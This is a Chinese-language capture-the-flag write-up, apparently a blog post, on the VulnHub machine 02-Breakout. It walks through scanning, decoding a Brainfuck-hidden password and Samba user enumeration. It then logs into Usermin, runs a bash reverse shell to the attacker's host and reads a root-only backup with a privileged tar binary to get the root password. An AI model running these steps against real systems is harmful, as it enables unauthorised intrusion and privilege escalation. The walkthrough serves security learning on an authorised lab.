当前位置：首页 > article >正文

vulhub系列-76-02-Breakout(超详细)

article 2026/4/21 7:26:24

免责声明本文记录的是 02-Breakout 渗透测试靶机的解题过程所有操作均在本地授权环境中进行。内容仅供网络安全学习与防护研究使用请勿用于任何非法用途。读者应遵守《网络安全法》及相关法律法规自觉维护网络空间安全。环境 https://download.vulnhub.com/empire/02-Breakout.zip一、信息收集1、探测目标IP地址arp-scan -l #探测当前网段的所有ip地址┌──(root㉿kali)-[~] └─# arp-scan -l #探测当前网段的所有ip地址 Interface: eth0, type: EN10MB, MAC: 00:0c:29:55:2f:ef, IPv4: 192.168.0.22 Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan) 192.168.0.1 00:50:56:c0:00:08 VMware, Inc. 192.168.0.2 00:50:56:e8:e2:84 VMware, Inc. 192.168.0.28 00:0c:29:f5:33:66 VMware, Inc. 192.168.0.254 00:50:56:e3:aa:d9 VMware, Inc. 5 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.10.0: 256 hosts scanned in 1.959 seconds (130.68 hosts/sec). 4 respondednmap -sP 192.168.0.0/24┌──(root㉿kali)-[~] └─# nmap -sP 192.168.0.0/24 Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-24 07:24 -0400 Nmap scan report for 192.168.0.1 Host is up (0.00019s latency). MAC Address: 00:50:56:C0:00:08 (VMware) Nmap scan report for 192.168.0.2 Host is up (0.00011s latency). MAC Address: 00:50:56:E8:E2:84 (VMware) Nmap scan report for 192.168.0.28 Host is up (0.00013s latency). MAC Address: 00:0C:29:F5:33:66 (VMware) Nmap scan report for 192.168.0.254 Host is up (0.00010s latency). MAC Address: 00:50:56:E3:AA:D9 (VMware) Nmap scan report for 192.168.0.22 Host is up. Nmap done: 256 IP addresses (5 hosts up) scanned in 4.52 seconds目标IP192.168.0.282、探测目标IP开放端口nmap -A -T4 -p 1-65535 192.168.0.28┌──(root㉿kali)-[~] └─# nmap -A -T4 -p 1-65535 192.168.0.28 Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-24 07:24 -0400 Nmap scan report for 192.168.0.28 Host is up (0.00028s latency). Not shown: 65530 closed tcp ports (reset) PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.51 ((Debian)) |_http-title: Apache2 Debian Default Page: It works |_http-server-header: Apache/2.4.51 (Debian) 139/tcp open netbios-ssn Samba smbd 4 445/tcp open netbios-ssn Samba smbd 4 10000/tcp open http MiniServ 1.981 (Webmin httpd) |_http-server-header: MiniServ/1.981 |_http-title: 200 mdash; Document follows 20000/tcp open http MiniServ 1.830 (Webmin httpd) |_http-title: 200 mdash; Document follows |_http-server-header: MiniServ/1.830 MAC Address: 00:0C:29:F5:33:66 (VMware) Device type: general purpose|router Running: Linux 4.X|5.X, MikroTik RouterOS 7.X OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3 OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) Network Distance: 1 hop Host script results: | smb2-time: | date: 2026-03-24T11:24:54 |_ start_date: N/A | smb2-security-mode: | 3.1.1: |_ Message signing enabled but not required |_nbstat: NetBIOS name: BREAKOUT, NetBIOS user: unknown, NetBIOS MAC: unknown (unknown) TRACEROUTE HOP RTT ADDRESS 1 0.28 ms 192.168.0.28 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 44.69 seconds 端口80、139、445、10000、200003、目录探测dirsearch -u http://192.168.0.28┌──(root㉿kali)-[~] └─# dirsearch -u http://192.168.0.28 /usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html from pkg_resources import DistributionNotFound, VersionConflict _|. _ _ _ _ _ _|_ v0.4.3 (_||| _) (/_(_|| (_| ) Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460 Output File: /root/reports/http_192.168.0.28/_26-03-24_07-25-00.txt Target: http://192.168.0.28/ [07:25:00] Starting: [07:25:01] 403 - 277B - /.ht_wsr.txt [07:25:01] 403 - 277B - /.htaccess.bak1 [07:25:01] 403 - 277B - /.htaccess.sample [07:25:01] 403 - 277B - /.htaccess.save [07:25:01] 403 - 277B - /.htaccess_extra [07:25:01] 403 - 277B - /.htaccess.orig [07:25:01] 403 - 277B - /.htaccess_sc [07:25:01] 403 - 277B - /.htaccess_orig [07:25:01] 403 - 277B - /.htaccessOLD2 [07:25:01] 403 - 277B - /.htaccessOLD [07:25:01] 403 - 277B - /.htaccessBAK [07:25:01] 403 - 277B - /.html [07:25:01] 403 - 277B - /.htm [07:25:01] 403 - 277B - /.htpasswd_test [07:25:01] 403 - 277B - /.htpasswds [07:25:01] 403 - 277B - /.httr-oauth [07:25:16] 301 - 313B - /manual - http://192.168.0.28/manual/ [07:25:16] 200 - 208B - /manual/index.html [07:25:21] 403 - 277B - /server-status [07:25:21] 403 - 277B - /server-status/ Task Completed二、漏洞利用1、信息搜集http://192.168.0.28/manual/en/index.htmlhttp://192.168.0.28:20000https://192.168.0.28:20000/查看源码可以发现最下面有一串不知道是什么东西查了一下这是一个Brainfuck编码。[-]...----..-----------.-----------...-.--------..------------.---------...解码后.2uqPEfj3DPa-3这应该是一个密码暂且当密码吧毕竟账号也没有这么奇怪的在nmap扫描端口的时候我们知道了139、445在 samba软件上。使用下列命令扫一下相关信息。enum4linux -a 192.168.0.28 密码.2uqPEfj3DPa-3┌──(root㉿kali)-[~] └─# enum4linux -a 192.168.0.28 Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Mar 24 07:31:29 2026 ( Target Information ) Target ........... 192.168.0.28 RID Range ........ 500-550,1000-1050 Username ......... Password ......... Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none ( Enumerating Workgroup/Domain on 192.168.0.28 ) [] Got domain/workgroup name: WORKGROUP ( Nbtstat Information for 192.168.0.28 ) Looking up status of 192.168.0.28 BREAKOUT 00 - B ACTIVE Workstation Service BREAKOUT 03 - B ACTIVE Messenger Service BREAKOUT 20 - B ACTIVE File Server Service ..__MSBROWSE__. 01 - GROUP B ACTIVE Master Browser WORKGROUP 00 - GROUP B ACTIVE Domain/Workgroup Name WORKGROUP 1d - B ACTIVE Master Browser WORKGROUP 1e - GROUP B ACTIVE Browser Service Elections MAC Address 00-00-00-00-00-00 ( Session Check on 192.168.0.28 ) [] Server 192.168.0.28 allows sessions using username , password ( Getting domain SID for 192.168.0.28 ) Domain Name: WORKGROUP Domain Sid: (NULL SID) [] Cant determine if host is part of domain or part of a workgroup ( OS information on 192.168.0.28 ) [E] Cant get OS info with smbclient [] Got OS info for 192.168.0.28 from srvinfo: BREAKOUT Wk Sv PrQ Unx NT SNT Samba 4.13.5-Debian platform_id : 500 os version : 6.1 server type : 0x809a03 ( Users on 192.168.0.28 ) Use of uninitialized value $users in print at ./enum4linux.pl line 972. Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 975. Use of uninitialized value $users in print at ./enum4linux.pl line 986. Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 988. ( Share Enumeration on 192.168.0.28 ) smbXcli_negprot_smb1_done: No compatible protocol selected by server. Sharename Type Comment --------- ---- ------- print$ Disk Printer Drivers IPC$ IPC IPC Service (Samba 4.13.5-Debian) Reconnecting with SMB1 for workgroup listing. Protocol negotiation to server 192.168.0.28 (for a protocol between LANMAN1 and NT1) failed: NT_STATUS_INVALID_NETWORK_RESPONSE Unable to connect with SMB1 -- no workgroup available [] Attempting to map shares on 192.168.0.28 //192.168.0.28/print$ Mapping: DENIED Listing: N/A Writing: N/A [E] Cant understand response: NT_STATUS_OBJECT_NAME_NOT_FOUND listing \* //192.168.0.28/IPC$ Mapping: N/A Listing: N/A Writing: N/A ( Password Policy Information for 192.168.0.28 ) Password: [] Attaching to 192.168.0.28 using a NULL share [] Trying protocol 139/SMB... [] Found domain(s): [] BREAKOUT [] Builtin [] Password Info for Domain: BREAKOUT [] Minimum password length: 5 [] Password history length: None [] Maximum password age: 136 years 37 days 6 hours 21 minutes [] Password Complexity Flags: 000000 [] Domain Refuse Password Change: 0 [] Domain Password Store Cleartext: 0 [] Domain Password Lockout Admins: 0 [] Domain Password No Clear Change: 0 [] Domain Password No Anon Change: 0 [] Domain Password Complex: 0 [] Minimum password age: None [] Reset Account Lockout Counter: 30 minutes [] Locked Account Duration: 30 minutes [] Account Lockout Threshold: None [] Forced Log off Time: 136 years 37 days 6 hours 21 minutes [] Retieved partial password policy with rpcclient: Password Complexity: Disabled Minimum Password Length: 5 ( Groups on 192.168.0.28 ) [] Getting builtin groups: [] Getting builtin group memberships: [] Getting local groups: [] Getting local group memberships: [] Getting domain groups: [] Getting domain group memberships: ( Users on 192.168.0.28 via RID cycling (RIDS: 500-550,1000-1050) ) [I] Found new SID: S-1-22-1 [I] Found new SID: S-1-5-32 [I] Found new SID: S-1-5-32 [I] Found new SID: S-1-5-32 [I] Found new SID: S-1-5-32 [] Enumerating users using SID S-1-5-21-1683874020-4104641535-3793993001 and logon username , password S-1-5-21-1683874020-4104641535-3793993001-501 BREAKOUT\nobody (Local User) S-1-5-21-1683874020-4104641535-3793993001-513 BREAKOUT\None (Domain Group) [] Enumerating users using SID S-1-5-32 and logon username , password S-1-5-32-544 BUILTIN\Administrators (Local Group) S-1-5-32-545 BUILTIN\Users (Local Group) S-1-5-32-546 BUILTIN\Guests (Local Group) S-1-5-32-547 BUILTIN\Power Users (Local Group) S-1-5-32-548 BUILTIN\Account Operators (Local Group) S-1-5-32-549 BUILTIN\Server Operators (Local Group) S-1-5-32-550 BUILTIN\Print Operators (Local Group) [] Enumerating users using SID S-1-22-1 and logon username , password S-1-22-1-1000 Unix User\cyber (Local User) ( Getting printer info for 192.168.0.28 ) No printers returned. enum4linux complete on Tue Mar 24 07:32:09 2026等到一个用户cyber扫到了一个cyber的账户在两个界面尝试20000端口可以登录成功。可以看到一个终端界面进去看看有没有什么命令可以执行cyber/.2uqPEfj3DPa-3登录成功2、反弹shell浏览器终端bash -i /dev/tcp/192.168.0.22/8888 01kalinc -lvnp 8888反弹成功┌──(root?kali)-[~] └─# nc -lvnp 8888 listening on [any] 8888 ... connect to [192.168.0.22] from (UNKNOWN) [192.168.0.28] 36682 bash: cannot set terminal process group (1636): Inappropriate ioctl for device bash: no job control in this shell cyberbreakout:~$三、权限提升1、信息搜集我们去它的备份文件里找找有没有另一个网站的密码。cd /var/backups ls -alcyberbreakout:~$ cd /var/backups cd /var/backups cyberbreakout:/var/backups$ cyberbreakout:/var/backups$ ls -al ls -al total 28 drwxr-xr-x 2 root root 4096 Mar 24 07:29 . drwxr-xr-x 14 root root 4096 Oct 19 2021 .. -rw-r--r-- 1 root root 12732 Oct 19 2021 apt.extended_states.0 -rw------- 1 root root 17 Oct 20 2021 .old_pass.bak cyberbreakout:/var/backups$将备份文件压缩再解压缩后再访问就可以得到密码。cd ~ tar -cf bak.tar /var/backups/.old_pass.bak tar -xf bak.tar cat var/backups/.old_pass.bakcyberbreakout:/var/backups$ cd ~ cd ~ cyberbreakout:~$ ls ls bak.tar tar user.txt cyberbreakout:~$ cyberbreakout:~$ cyberbreakout:~$ ./tar -cf bak.tar /var/backups/.old_pass.bak ./tar -cf bak.tar /var/backups/.old_pass.bak ./tar: Removing leading / from member names cyberbreakout:~$ cyberbreakout:~$ chmod x tar chmod x tar chmod: changing permissions of tar: Operation not permitted cyberbreakout:~$ cyberbreakout:~$ ls -la ls -la total 580 drwxr-xr-x 8 cyber cyber 4096 Mar 24 07:36 . drwxr-xr-x 3 root root 4096 Oct 19 2021 .. -rw-r--r-- 1 cyber cyber 10240 Mar 24 07:39 bak.tar -rw------- 1 cyber cyber 0 Oct 20 2021 .bash_history -rw-r--r-- 1 cyber cyber 220 Oct 19 2021 .bash_logout -rw-r--r-- 1 cyber cyber 3526 Oct 19 2021 .bashrc drwxr-xr-x 2 cyber cyber 4096 Oct 19 2021 .filemin drwx------ 2 cyber cyber 4096 Oct 19 2021 .gnupg drwxr-xr-x 3 cyber cyber 4096 Oct 19 2021 .local -rw-r--r-- 1 cyber cyber 807 Oct 19 2021 .profile drwx------ 2 cyber cyber 4096 Oct 19 2021 .spamassassin -rwxr-xr-x 1 root root 531928 Oct 19 2021 tar drwxr-xr-x 2 cyber cyber 4096 Oct 20 2021 .tmp drwx------ 16 cyber cyber 4096 Oct 19 2021 .usermin -rw-r--r-- 1 cyber cyber 48 Oct 19 2021 user.txt cyberbreakout:~$ cyberbreakout:~$ tar -xf bak.tar tar -xf bak.tar cyberbreakout:~$ cyberbreakout:~$ cat var/backups/.old_pass.bak cat var/backups/.old_pass.bak Ts4YurgtRX(~h cyberbreakout:~$ cyberbreakout:~$得到密码之后在20000端口重新登录root账号即可有root权限的终端root/Ts4YurgtRX(~h[rootbreakout ~]$ ls rOOt.txt [rootbreakout ~]$ cat rOOt.txt 3mp!r3{You_Manage_To_BreakOut_From_My_System_Congratulation} Author: Icex64 Empire Cybersecurity [rootbreakout ~]$本文涉及的技术方法仅适用于授权测试环境或合法 CTF 赛事。请勿在未授权的情况下对任何系统进行测试。安全之路始于合规终于责任。

vulhub系列-76-02-Breakout(超详细)

相关文章：

vulhub系列-76-02-Breakout(超详细)

vulhub系列-74-Hackable III(超详细)

vulhub系列-73-RA1NXing Bots(超详细)

知识图谱(BILSTM+CRF项目完整实现)【第六章】

LLM应用缓存设计范式重构，Dify 2026新增Context-Aware TTL引擎与动态驱逐策略

NativeScript APP 开发备忘

unity mcp接入实现一句话生成游戏！

担心2026年数字人直播系统投入过高？五款主流平台落地方案对比评测

多态章-虚函数-重写-协变-override/final-重写覆盖隐藏的对比-纯虚函数与抽象类-多态的底层-虚函数表-动态绑定-静态绑定

Phi-3-mini-4k-instruct-gguf多场景应用：写邮件/解题/写SQL/生成测试用例实战演示

Java八股文实战：从原理到代码，解析Pixel Couplet Gen的Java客户端设计

金融评分卡‌是一种将用户信用风险量化为分数的模型工具，广泛应用于贷款审批、额度定价和风险预警等环节，分数越高代表风险越低

0421晨间日记

数据预处理和超范围值处理步骤 18

辅助医生能力成长与患者个体化治疗方案生成系统（上）

【2026最新】JDK 下载安装与环境配置全教程（Windows/Mac/Linux 三平台，零基础友好）

在 Word 中，一个公式就能看出你会不会高效排版

从零开始：Spring Boot + MyBatis 搭建后端接口完整教程

当智能眼镜遇上了AI——使用灵珠搭建【镜中食谱】智能体

Pi0视觉-语言-动作流模型科研应用：人类意图识别与机器人行为对齐研究

robot_localization实现imu和odom融合

从扩频时钟到弹性缓存：一张图看懂PCIe是如何‘容忍’时钟偏差，保证数据不丢的

《Spring Boot 第一个 REST API 教程》

ROS2笔记2:使用Topic自定义Messages实现nodes之间通讯

如何3分钟解决百度网盘提取码难题：baidupankey完全指南

2026年最新好用的WMS仓库管理系统盘点！10款国内外热门WMS系统推荐

3分钟搞定百度网盘提取码：baidupankey智能工具终极指南

打卡信奥刷题（3138）用C++实现信奥题 P7617 [COCI 2011/2012 #2] KOMPIĆI

如何让全面战争MOD开发从繁琐变得优雅：RPFM的现代化解决方案

我第一次做 OData 后端服务时，真正绊住我的，不是代码，而是 Cloud Foundry 里的这些基础坑